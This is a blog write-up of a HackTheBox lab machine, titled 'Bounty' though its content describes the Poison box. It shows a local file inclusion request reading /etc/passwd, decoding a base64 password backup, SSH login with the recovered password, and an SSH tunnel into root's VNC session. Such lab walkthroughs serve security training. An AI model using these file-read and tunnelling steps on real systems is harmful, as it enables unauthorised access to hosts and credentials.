Menu
Article

Bounty - Hackthebox.eu

FlagCapturer

FlagCapturer

• 5 min read

Great box over at hackthebox.eu, which learned me a nifty new trick. Lets get started!

Enumeration

As always, we start with a full nmap scan:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
sudo nmap -sV -sC -oA initial -p- 10.10.10.84
Nmap scan report for 10.10.10.84
Host is up (0.038s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
| 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
| 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_ 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 413.45 seconds

So we have port 80 running a HTTP service and port 22 running SSH.

Browsing to webpage displays the following:

We can run the following commands: Sites to be tested: ini.php, info.php, listfiles.php, phpinfo.php

info.php reveals the following:

1
FreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE #0 r321309: Fri Jul 21 02:08:28 UTC 2017 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64

The machine runs FreeBSD 11.1. This might come in handy later. Running listfiles.php shows:

1
Array ( [0] =. [1]; .. [2]; browse.php [3]; index.php; info.php; ini.php; listfiles.php; phpinfo.php; pwdbackup.txt )

That sounds like an interesting file. First lets see what happens when we change the parameter after the file= part:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
http://10.10.10.84/browse.php?file=/etc/passwd
# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr
$ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and
Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games
pseudo-user:/:/usr/sbin/nologin news:*:8:8:News
Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man
Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell
Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission
User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail
Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind
Sandbox:/:/usr/sbin/nologin unbound:*:59:59:Unbound DNS
Resolver:/var/unbound:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-
user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep
user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65:dhcp
programs:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-
user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post
Office Owner:/nonexistent:/usr/sbin/nologin auditdistd:*:78:77:Auditdistd
unprivileged user:/var/empty:/usr/sbin/nologin www:*:80:80:World Wide Web
Owner:/nonexistent:/usr/sbin/nologin _ypldap:*:160:160:YP LDAP unprivileged
user:/var/empty:/usr/sbin/nologin hast:*:845:845:HAST unprivileged
user:/var/empty:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged
user:/nonexistent:/usr/sbin/nologin _tss:*:601:601:TrouSerS
user:/var/empty:/usr/sbin/nologin messagebus:*:556:556:D-BUS Daemon
User:/nonexistent:/usr/sbin/nologin avahi:*:558:558:Avahi Daemon
User:/nonexistent:/usr/sbin/nologin cups:*:193:193:Cups
Owner:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh

So our user is probably charix.

Lets see what is in that pwdbackup.txt file by using: http://10.10.10.84/browse.php?file=pwdbackup.txt

1
2
3
This password is secure, it's encoded atleast 13 times.. what could go wrong really..
Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVUbGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBSbVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVWM040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRsWmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYyeG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01GWkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYwMXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVaT1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5kWFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZkWGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZTVm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZzWkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBWVmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpOUkd4RVdub3dPVU5uUFQwSwo=

Looking at the way the key was constructed, it looks like a base64 encoded key. The hint points us to that it is probably encoded 13 times. I’ve used the Cyberchef from GCHQ to decrypt the thing. It gives us the following key

1
Charix!2#4%6&8(0

The only service we’ve seen so far is the SSH service.

Exploitation

ssh 10.10.10.84 -l charix

Password: Charix!2#4%6&8(0

And we’re logged in.

Privilege Escalation

After running LinEnum, I noticed that a VNC service is running as root. To further explore this. Running LinEnum, I see that root is running VNC on 5901 and 5801, as well as sshd (which I already used to get access to the box). So, I probably need to setup a SSH tunnel to this machine and use VNC viewer to get access to the VNC-sessions on the Poisoin host.

I do the following:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
charix@Poison:~ % sockstat -l
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS
www httpd 713 3 tcp6 *:80 *:*
www httpd 713 4 tcp4 *:80 *:*
www httpd 712 3 tcp6 *:80 *:*
www httpd 712 4 tcp4 *:80 *:*
www httpd 711 3 tcp6 *:80 *:*
www httpd 711 4 tcp4 *:80 *:*
root sendmail 642 3 tcp4 127.0.0.1:25 *:*
www httpd 641 3 tcp6 *:80 *:*
www httpd 641 4 tcp4 *:80 *:*
www httpd 640 3 tcp6 *:80 *:*
www httpd 640 4 tcp4 *:80 *:*
www httpd 639 3 tcp6 *:80 *:*
www httpd 639 4 tcp4 *:80 *:*
www httpd 638 3 tcp6 *:80 *:*
www httpd 638 4 tcp4 *:80 *:*
www httpd 637 3 tcp6 *:80 *:*
www httpd 637 4 tcp4 *:80 *:*
root httpd 625 3 tcp6 *:80 *:*
root httpd 625 4 tcp4 *:80 *:*
root sshd 620 3 tcp6 *:22 *:*
root sshd 620 4 tcp4 *:22 *:*
root Xvnc 529 0 stream /tmp/.X11-unix/X1
root Xvnc 529 1 tcp4 127.0.0.1:5901 *:*
root Xvnc 529 3 tcp4 127.0.0.1:5801 *:*
root syslogd 390 4 dgram /var/run/log
root syslogd 390 5 dgram /var/run/logpriv
root syslogd 390 6 udp6 *:514 *:*
root syslogd 390 7 udp4 *:514 *:*
root devd 319 4 stream /var/run/devd.pipe
root devd 319 5 seqpac /var/run/devd.seqpacket.pipe

I used  http://www.cl.cam.ac.uk/research/dtg/attarchive/vnc/sshvnc.html  and https://null-byte.wonderhowto.com/how-to/remotely-control-computers-over-vnc-securely-with-ssh-0132656/ for research.

There is also a secret.zip file on the machine. Let’s start by setting up a tunnel:

1
ssh -L 5901:localhost:5901 -N -f -l charix 10.10.10.84

 

Using vncviewer, we can get access to the desktop of the root user, which contains the key:

1
2
vncviewer -passwd secret
Use localhost:5901 to get access.
Share
Show Comments

Topics

ctf: 12 information security: 12 writeup: 12 capturetheflag: 11 walkthrough: 11 active: 2 hackthebox: 2 hackthebox.eu: 2 vulnhub: 2 blue: 1 celestial: 1 chatterbox: 1 eternal blue: 1 hawk: 1 Jerry: 1 lazyadmin: 1 mirai: 1 nodejs: 1 poison: 1 samba: 1 waldo: 1